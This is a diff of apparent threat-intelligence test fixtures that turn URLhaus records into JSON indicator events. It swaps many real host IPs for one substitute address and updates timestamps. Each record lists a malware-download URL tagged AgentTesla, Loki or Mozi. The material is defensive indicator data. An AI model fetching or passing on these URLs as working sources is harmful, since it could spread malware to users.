- "ingested": "2021-12-13T06:08:08.694877585Z", + "ingested": "2021-12-13T08:40:08.029253900Z", "original": "{\"id\":\"960918\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960918/\",\"url\":\"http://kalamikwsdyonlinedws.dns.navy/kaladoc/vbc.exe\",\"url_status\":\"online\",\"host\":\"kalamikwsdyonlinedws.dns.navy\",\"date_added\":\"2021-01-14 15:45:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"AgentTesla\",\"exe\"]}", "category": "threat", "type": "indicator", @@ -30650,17 +30650,17 @@ "url": { "path": "/js/js/lokkk.jpg", "extension": "jpg", - "original": "http://54.224.10.186/js/js/lokkk.jpg", + "original": "http://89.160.20.156/js/js/lokkk.jpg", "scheme": "http", - "domain": "54.224.10.186", - "full": "http://54.224.10.186/js/js/lokkk.jpg" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/js/js/lokkk.jpg" }, - "ip": "54.224.10.186" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694881462Z", - "original": "{\"id\":\"960917\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960917/\",\"url\":\"http://54.224.10.186/js/js/lokkk.jpg\",\"url_status\":\"online\",\"host\":\"54.224.10.186\",\"date_added\":\"2021-01-14 15:45:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"exe\",\"Loki\"]}", + "ingested": "2021-12-13T08:40:08.029260500Z", + "original": "{\"id\":\"960917\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960917/\",\"url\":\"http://89.160.20.156/js/js/lokkk.jpg\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:45:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"exe\",\"Loki\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30698,18 +30698,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://59.99.141.110:33201/Mozi.a", + "original": "http://89.160.20.156:33201/Mozi.a", "scheme": "http", "port": 33201, - "domain": "59.99.141.110", - "full": "http://59.99.141.110:33201/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33201/Mozi.a" }, - "ip": "59.99.141.110" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694885380Z", - "original": "{\"id\":\"960916\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960916/\",\"url\":\"http://59.99.141.110:33201/Mozi.a\",\"url_status\":\"offline\",\"host\":\"59.99.141.110\",\"date_added\":\"2021-01-14 15:38:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029267200Z", + "original": "{\"id\":\"960916\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960916/\",\"url\":\"http://89.160.20.156:33201/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30747,18 +30747,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.136.138:53926/Mozi.m", + "original": "http://89.160.20.156:53926/Mozi.m", "scheme": "http", "port": 53926, - "domain": "59.99.136.138", - "full": "http://59.99.136.138:53926/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53926/Mozi.m" }, - "ip": "59.99.136.138" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694889287Z", - "original": "{\"id\":\"960914\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960914/\",\"url\":\"http://59.99.136.138:53926/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.136.138\",\"date_added\":\"2021-01-14 15:38:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029273800Z", + "original": "{\"id\":\"960914\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960914/\",\"url\":\"http://89.160.20.156:53926/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30796,18 +30796,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.245.159.55:43917/Mozi.m", + "original": "http://89.160.20.156:43917/Mozi.m", "scheme": "http", "port": 43917, - "domain": "61.245.159.55", - "full": "http://61.245.159.55:43917/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43917/Mozi.m" }, - "ip": "61.245.159.55" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694893395Z", - "original": "{\"id\":\"960915\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960915/\",\"url\":\"http://61.245.159.55:43917/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.245.159.55\",\"date_added\":\"2021-01-14 15:38:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029280400Z", + "original": "{\"id\":\"960915\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960915/\",\"url\":\"http://89.160.20.156:43917/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30845,18 +30845,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.43.122:42053/Mozi.m", + "original": "http://89.160.20.156:42053/Mozi.m", "scheme": "http", "port": 42053, - "domain": "59.99.43.122", - "full": "http://59.99.43.122:42053/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42053/Mozi.m" }, - "ip": "59.99.43.122" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694897322Z", - "original": "{\"id\":\"960911\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960911/\",\"url\":\"http://59.99.43.122:42053/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.43.122\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029287Z", + "original": "{\"id\":\"960911\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960911/\",\"url\":\"http://89.160.20.156:42053/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30894,18 +30894,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://49.68.21.201:57875/Mozi.m", + "original": "http://89.160.20.156:57875/Mozi.m", "scheme": "http", "port": 57875, - "domain": "49.68.21.201", - "full": "http://49.68.21.201:57875/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57875/Mozi.m" }, - "ip": "49.68.21.201" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694901350Z", - "original": "{\"id\":\"960912\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960912/\",\"url\":\"http://49.68.21.201:57875/Mozi.m\",\"url_status\":\"online\",\"host\":\"49.68.21.201\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029293600Z", + "original": "{\"id\":\"960912\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960912/\",\"url\":\"http://89.160.20.156:57875/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30943,18 +30943,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.96.26.38:35523/Mozi.m", + "original": "http://89.160.20.156:35523/Mozi.m", "scheme": "http", "port": 35523, - "domain": "59.96.26.38", - "full": "http://59.96.26.38:35523/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35523/Mozi.m" }, - "ip": "59.96.26.38" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694905307Z", - "original": "{\"id\":\"960913\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960913/\",\"url\":\"http://59.96.26.38:35523/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.26.38\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029300100Z", + "original": "{\"id\":\"960913\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960913/\",\"url\":\"http://89.160.20.156:35523/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30992,18 +30992,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://42.224.66.103:47418/i", + "original": "http://89.160.20.156:47418/i", "scheme": "http", "port": 47418, - "domain": "42.224.66.103", - "full": "http://42.224.66.103:47418/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47418/i" }, - "ip": "42.224.66.103" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694909235Z", - "original": "{\"id\":\"960910\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960910/\",\"url\":\"http://42.224.66.103:47418/i\",\"url_status\":\"online\",\"host\":\"42.224.66.103\",\"date_added\":\"2021-01-14 15:38:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.029306800Z", + "original": "{\"id\":\"960910\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960910/\",\"url\":\"http://89.160.20.156:47418/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31041,18 +31041,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.41.206.240:53007/Mozi.m", + "original": "http://89.160.20.156:53007/Mozi.m", "scheme": "http", "port": 53007, - "domain": "27.41.206.240", - "full": "http://27.41.206.240:53007/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53007/Mozi.m" }, - "ip": "27.41.206.240" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694913633Z", - "original": "{\"id\":\"960908\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960908/\",\"url\":\"http://27.41.206.240:53007/Mozi.m\",\"url_status\":\"offline\",\"host\":\"27.41.206.240\",\"date_added\":\"2021-01-14 15:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029313500Z", + "original": "{\"id\":\"960908\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960908/\",\"url\":\"http://89.160.20.156:53007/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31090,18 +31090,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.133.2:38089/Mozi.m", + "original": "http://89.160.20.156:38089/Mozi.m", "scheme": "http", "port": 38089, - "domain": "42.230.133.2", - "full": "http://42.230.133.2:38089/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38089/Mozi.m" }, - "ip": "42.230.133.2" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694917540Z", - "original": "{\"id\":\"960909\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960909/\",\"url\":\"http://42.230.133.2:38089/Mozi.m\",\"url_status\":\"offline\",\"host\":\"42.230.133.2\",\"date_added\":\"2021-01-14 15:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029320200Z", + "original": "{\"id\":\"960909\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960909/\",\"url\":\"http://89.160.20.156:38089/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31139,18 +31139,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.178.221:35243/Mozi.m", + "original": "http://89.160.20.156:35243/Mozi.m", "scheme": "http", "port": 35243, - "domain": "42.230.178.221", - "full": "http://42.230.178.221:35243/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35243/Mozi.m" }, - "ip": "42.230.178.221" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694921508Z", - "original": "{\"id\":\"960904\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960904/\",\"url\":\"http://42.230.178.221:35243/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.178.221\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029327Z", + "original": "{\"id\":\"960904\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960904/\",\"url\":\"http://89.160.20.156:35243/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31188,18 +31188,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.249.12:50589/Mozi.m", + "original": "http://89.160.20.156:50589/Mozi.m", "scheme": "http", "port": 50589, - "domain": "42.224.249.12", - "full": "http://42.224.249.12:50589/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50589/Mozi.m" }, - "ip": "42.224.249.12" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694925335Z", - "original": "{\"id\":\"960905\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960905/\",\"url\":\"http://42.224.249.12:50589/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.249.12\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029333600Z", + "original": "{\"id\":\"960905\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960905/\",\"url\":\"http://89.160.20.156:50589/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31237,18 +31237,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://221.200.70.79:42479/Mozi.m", + "original": "http://89.160.20.156:42479/Mozi.m", "scheme": "http", "port": 42479, - "domain": "221.200.70.79", - "full": "http://221.200.70.79:42479/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42479/Mozi.m" }, - "ip": "221.200.70.79" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694929222Z", - "original": "{\"id\":\"960906\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960906/\",\"url\":\"http://221.200.70.79:42479/Mozi.m\",\"url_status\":\"online\",\"host\":\"221.200.70.79\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029340100Z", + "original": "{\"id\":\"960906\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960906/\",\"url\":\"http://89.160.20.156:42479/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31286,18 +31286,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.168.94:43425/Mozi.m", + "original": "http://89.160.20.156:43425/Mozi.m", "scheme": "http", "port": 43425, - "domain": "42.224.168.94", - "full": "http://42.224.168.94:43425/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43425/Mozi.m" }, - "ip": "42.224.168.94" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694933971Z", - "original": "{\"id\":\"960907\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960907/\",\"url\":\"http://42.224.168.94:43425/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.168.94\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029346700Z", + "original": "{\"id\":\"960907\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960907/\",\"url\":\"http://89.160.20.156:43425/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31335,18 +31335,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://163.125.207.35:35013/Mozi.a", + "original": "http://89.160.20.156:35013/Mozi.a", "scheme": "http", "port": 35013, - "domain": "163.125.207.35", - "full": "http://163.125.207.35:35013/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35013/Mozi.a" }, - "ip": "163.125.207.35" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694938179Z", - "original": "{\"id\":\"960903\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960903/\",\"url\":\"http://163.125.207.35:35013/Mozi.a\",\"url_status\":\"online\",\"host\":\"163.125.207.35\",\"date_added\":\"2021-01-14 15:36:28 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029353200Z", + "original": "{\"id\":\"960903\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960903/\",\"url\":\"http://89.160.20.156:35013/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:36:28 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31384,18 +31384,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.44.244.43:35298/Mozi.m", + "original": "http://89.160.20.156:35298/Mozi.m", "scheme": "http", "port": 35298, - "domain": "125.44.244.43", - "full": "http://125.44.244.43:35298/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35298/Mozi.m" }, - "ip": "125.44.244.43" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694942627Z", - "original": "{\"id\":\"960902\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960902/\",\"url\":\"http://125.44.244.43:35298/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.44.244.43\",\"date_added\":\"2021-01-14 15:35:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029359800Z", + "original": "{\"id\":\"960902\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960902/\",\"url\":\"http://89.160.20.156:35298/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31433,18 +31433,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.73.8.210:54174/Mozi.m", + "original": "http://89.160.20.156:54174/Mozi.m", "scheme": "http", "port": 54174, - "domain": "116.73.8.210", - "full": "http://116.73.8.210:54174/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54174/Mozi.m" }, - "ip": "116.73.8.210" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694947296Z", - "original": "{\"id\":\"960900\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960900/\",\"url\":\"http://116.73.8.210:54174/Mozi.m\",\"url_status\":\"online\",\"host\":\"116.73.8.210\",\"date_added\":\"2021-01-14 15:35:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029366400Z", + "original": "{\"id\":\"960900\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960900/\",\"url\":\"http://89.160.20.156:54174/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31482,18 +31482,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://121.61.104.66:42768/Mozi.a", + "original": "http://89.160.20.156:42768/Mozi.a", "scheme": "http", "port": 42768, - "domain": "121.61.104.66", - "full": "http://121.61.104.66:42768/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42768/Mozi.a" }, - "ip": "121.61.104.66" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694951634Z", - "original": "{\"id\":\"960901\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960901/\",\"url\":\"http://121.61.104.66:42768/Mozi.a\",\"url_status\":\"online\",\"host\":\"121.61.104.66\",\"date_added\":\"2021-01-14 15:35:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029373100Z", + "original": "{\"id\":\"960901\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960901/\",\"url\":\"http://89.160.20.156:42768/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31531,18 +31531,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://117.247.206.115:59110/Mozi.a", + "original": "http://89.160.20.156:59110/Mozi.a", "scheme": "http", "port": 59110, - "domain": "117.247.206.115", - "full": "http://117.247.206.115:59110/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59110/Mozi.a" }, - "ip": "117.247.206.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694956764Z", - "original": 